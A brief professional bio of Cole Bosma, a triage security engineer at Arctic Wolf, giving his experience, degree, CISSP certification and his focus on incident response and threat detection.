Cole Bosma is a Triage Security Engineer 3 at Arctic Wolf, with over 6 years of experience in cybersecurity. With a Master’s degree in Cyber Defense and a CISSP certification, he specializes in incident response and threat detection, ensuring robust protection for Arctic Wolf’s customers.
